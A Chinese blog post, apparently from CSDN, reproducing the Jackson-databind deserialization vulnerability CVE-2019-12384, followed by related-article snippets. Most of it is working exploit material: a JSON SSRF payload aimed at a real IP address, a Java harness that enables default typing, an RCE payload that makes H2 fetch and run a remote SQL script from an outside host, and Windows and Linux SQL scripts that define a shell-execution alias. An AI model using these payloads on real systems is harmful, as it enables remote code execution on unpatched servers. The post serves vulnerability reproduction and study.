jackson框架java反序列化漏洞_Jackson CVE-2019-12384: 反序列化漏洞复现

最新推荐文章于 2024-05-03 22:30:16 发布
最新推荐文章于 2024-05-03 22:30:16 发布
阅读量400 收藏
点赞数
文章标签: jackson框架java反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39830200/article/details/114508664
版权

文章参考:https://blog.doyensec.com/2019/07/22/jackson-gadgets.html

环境搭建

引入jar包:

ssrf payload:

"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://139.196.103.119:9999/test\"}]"

Main方法:

import java.io.IOException;

import com.fasterxml.jackson.databind.ObjectMapper;

import com.fasterxml.jackson.databind.SerializationFeature;

public class Test {

public static void main(String[] args) throws IOException {

String payload = "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\","

+ " {\"url\":\"jdbc:h2:tcp://139.196.103.119:9999/test\"}]";

ObjectMapper mapper = new ObjectMapper();

mapper.enableDefaultTyping();

// mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);

Object obj = mapper.readValue(payload, java.lang.Object.class);

mapper.writeValueAsString(obj);

}

}

f34213a2d06fbbb83976fd5ae0b2074d.png

rce payload:

"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://www.a0xpg.com/inject_win.sql'\"}]";

inject_win.sql

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {

String[] command = {"cmd", "/c", cmd};

java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");

return s.hasNext() ? s.next() : ""; }

$$;

CALL SHELLEXEC('calc')

e157878549ce51393e8399fcb2c82013.png

inject_linux.sql

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {

String[] command = {"bash", "-c", cmd};

java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");

return s.hasNext() ? s.next() : ""; }

$$;

CALL SHELLEXEC('id > exploited.txt')

631af60bdcfa76dc3a68977d6ae402ff.png

e087eb84b07cd89094b83a2c0f8cf05c.png

weixin_39830200
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jackson_RCE-CVE-2019-12384:CVE-2019-12384 漏洞测试环境
05-26
环境搭建 将项目导入到idea,再配置好maven之后设置自动导入依赖库,然后在本地的web空目录写入如下文件,保存为exec.sql。并启动一个http server: CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { String[] command = {"/bin/bash", "-c", cmd}; java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\0A"); return s.hasNext() ? s.next() : ""; } $$; CALL SHEL
(环境搭建+复现CVE-2019-12384 Jackson 远程代码执行漏洞
daxi0ng的博客
03-30 4013
1、【CVE编号】 CVE-2019-12384 2、【漏洞名称】 Jackson 远程命令执行漏洞 3、【靶标分类】 Web类型类靶标 4、【影响版本】 Jackson-databind 2.X < 2.9.9.1 5、【漏洞分类】 代码执行 6、【漏洞等级】 高 7、【漏洞简介】 由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enab...
2024年网络安全最新再爆安全漏洞,这次轮到Jackson了,竟由阿里云上报
最新发布
2401_84297455的博客
05-03 1055
熟悉A哥的小伙伴知道,自从Fastjson上次爆出重大安全漏洞之后,我彻底的投入到了Jackson的阵营,工作中也慢慢去Fastjson化。
jackson框架java反序列化漏洞_预警Jackson < 2.9.9.1 反序列化远程代码执行漏洞(CVE-2019-12384)...
weixin_42540248的博客
03-06 564
2019年7月23日,本站安全专题监测到有安全研究人员披露Jackson < 2.9.9.1 存在反序列化远程代码执行漏洞(CVE-2019-12384),利用可导致远程执行服务器命令,官方git已发布公告说明,请使用到Jackson的用户尽快升级至安全版本。漏洞描述Jackson是一套开源java高性能JSON处理器,其在反序列化处理JSON格式时存在缺陷,当用户提交一个精心构造的恶意JS...
Jackson 远程命令执行漏洞CVE-2019-12384
锋刃科技的博客
06-26 8152
前言 由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。 影响版本 Jackson-databind 2.0.0 ~2.9.9.1 环境搭建 创建一个docker-compose.yml的文件 version: '2' services: web: image: te
Jackson-databind 反序列化漏洞CVE-2017-7525)复现
HEAVEN569的博客
03-12 1860
1.漏洞出现的原因 Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当json字符串转换的Target class中有polymorph fields,即字段类型为接口、抽象或Object类型时,攻击者可以通过在json字符串中指定变量的具体类型(子类或者接口实现类,)来实现实例化指定的类,借助某些特殊的class,如TemplatesImpl,可以实现任意代码执行。 所以本漏洞利用条件如下 1.开启JacksonPo..
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具,方便我们进行漏洞利用getshell。
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具,ActiveMQ,漏洞反序列化漏洞CVE-2015-5254,利用工具,工具
Jackson反序列化远程代码执行漏洞CVE-2020-24616)复现
锋刃科技的博客
04-26 2656
简介 FasterXML Jackson是美国FasterXML公司的一款适用于Java的数据处理工具。jackson-databind是其中的一个具有数据绑定功能的组件。 影响版本 jackson-databind < 2.9.10.6 环境搭建 搭建一个Java项目,新建一个Poc类,下载并导入存在漏洞的包 导入存在漏洞的包 exp文件 编译并启动环境 javac Exploit.java py -3 -m http.server 88...
FasterXML/jackson-databind 远程代码执行漏洞CVE-2020-8840)复现
锋刃科技的博客
12-12 6272
漏洞概述 FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方库,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。 此次漏洞中攻击者可利用xbean-reflect的利用链触发JNDI远程类加载从而达到远程代码执行。 影响版本 2.0.0 <= FasterXML jackson-databind Version <= 2.9.10.2 环境搭建 项目地址: h...
java 漏洞复现_CVE-2019-12384漏洞分析及复现
weixin_42463997的博客
03-02 1063
原标题:CVE-2019-12384漏洞分析及复现*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。引言近期关于Jackson的RCE漏洞CVE-2019-12384爆出,关于漏洞复现以及依赖,这里已经给出,笔者这边使用java的环境重新复现了一下,权当给各位看官当个翻译,也让在java上进行漏洞复现的兄弟们少走点弯路。环境准备本...
CVE-2019-12384 jackson ssrf-rce漏洞复现
ZJT6666666的博客
12-28 694
CVE-2019-12384 jackson ssrf-rce漏洞复现
应用安全漏洞及修复
xinpz的博客
02-20 2285
应用安全漏洞及修复 近期阿里云服务漏洞扫描,发现大量应用安全漏洞,做出安全漏洞修复方案,一般三方jar包漏洞,官方发布漏洞时,肯定已有新版本做了处理,所以我们只需要做jar版本升级即可。 漏洞处理方案 2021-02-20 漏洞处理方案 编写目的 安全漏洞如果被恶意用户利用,会造成服务器及系统被攻击利用,造成严重损失。 为保障服务及系统安全,发现的安全漏洞需要及时修复。 适用范围 研发人员,运维人员 安全漏洞 阿里云业务层面漏洞整理文档 XStream 漏洞...
CDH6.3.1集群修复Jackson-databind远程代码执行漏洞 CVE-2019-12384
BertramLAU的专栏
07-23 1976
系统环境 CentOS 7.7.1908 CDH 6.3.1 Jackson-databind 2.9.8/2.9.9/2.9.9.3 漏洞描述 【CVECVE-2019-12384漏洞描述】 由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。 【受影响版本】 Jackson-databin
Jackson 反序列化远程代码执行漏洞复现
Ms08067安全实验室
07-24 2210
本文作者:light(Ms08067实验室 SRSP TEAM小组成员)jackson介绍Jackson是一个能够将java对象序列化为JSON字符串,也能够将JSON字符串反序列化为j...
vulhub漏洞复现29_Jackson
weixin_44193247的博客
02-03 1012
vulhub漏洞复现练习篇
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值